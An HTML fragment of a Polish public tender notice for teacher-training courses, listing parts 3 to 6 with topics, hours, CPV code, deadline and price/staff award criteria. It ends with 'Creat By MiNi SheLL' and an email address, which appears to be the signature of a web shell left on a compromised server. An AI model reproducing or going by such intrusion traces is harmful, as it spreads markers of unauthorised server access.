14	Wspomaganie dzieci w rozumieniu tego, co trudne - w skupieniu uwagi, ćwiczeniu pamięci i wspomaganiu zapamiętywania informacji uporządkowanych	3
15	Stosowanie aktywizujących metod pracy na zajęciach z: języka polskiego, języka obcego, matematyki, edukacji wczesnoszkolnej, w-f, przyrody i techniki	6
16	Organizacja procesu lekcyjnego z uwzględnieniem zróżnicowanego poziomu opanowania wiedzy	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kadra i zasoby - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> część III - doskonalenie nauczycieli - 8 (45 godzin).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Techniki efektywnego uczenia się i zapamiętywania.	9
2	Najnowsze techniki uczenia się, zapamiętywania i metody aktywizujące oraz narzędzia do motywowania.	15
3	Techniki nauczania oraz metody aktywizujące 	12
4	Psychologiczne aspekty motywowania uczniów do nauki 	6
5	Praca z uczniem o specyficznych trudnościach w uczeniu się	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kadra i zasoby - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> część IV - doskonalenie nauczycieli - 12 (24 godziny).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Obsługa tablicy interaktywnej i wykorzystanie innych metod aktywizujących	3
2	Praca z tablicą interaktywną - tworzenie testów	6
3	Obsługa i praca na platformie e-learningowej	6
4	Praca na platformie e-learningowej (platforma moodle) na poziomie podstawowym i zaawansowanym	9.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kadra i zasoby - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> część V - doskonalenie nauczycieli - 28 (9  godzin).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Pozyskiwanie z sukcesem środków finansowych z różnych źródeł (nie tylko unijnych), nauka pisania wniosków o pozyskanie środków finansowych	9.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kadra i zasoby - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> część VI- doskonalenie nauczycieli - 29 (6 godzin).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Skuteczne techniki uczenia się i zapamiętywania - NLP	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kadra i zasoby - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com